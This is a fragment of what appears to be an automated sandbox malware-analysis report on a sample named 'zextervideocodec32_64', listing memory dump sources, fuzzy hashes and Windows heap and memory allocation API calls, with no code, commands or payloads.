                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 1300498068-3145022300
                                                                                                      • Opcode ID: 73c7405203d3cf30de52ffeb2ee461cd998ebf0274dfec94da9e45403eab6fdb
                                                                                                      • Instruction ID: 9ff9f2764a5c654805e9ca136d45d92882dffecc5434a30e482f7dfab5d1378e
                                                                                                      • Opcode Fuzzy Hash: 73c7405203d3cf30de52ffeb2ee461cd998ebf0274dfec94da9e45403eab6fdb
                                                                                                      • Instruction Fuzzy Hash: DAE092B1900108DBCB28EF98D062BA8BBB1EB04306F6080ECAE0347390DB715A06CF81
                                                                                                      APIs
                                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404A98
                                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404ACC
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AE6
                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AFD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3499195154-0
                                                                                                      • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                                      • Instruction ID: e2b6aa67baf941fda6b0a0502f281f3949fe5c10b928d307e266fea8edbc1969
                                                                                                      • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                                      • Instruction Fuzzy Hash: 1E1113B0201601EFC7208F19EE85E227BB5FB857217114A3AF692E65F1D770A845CB4C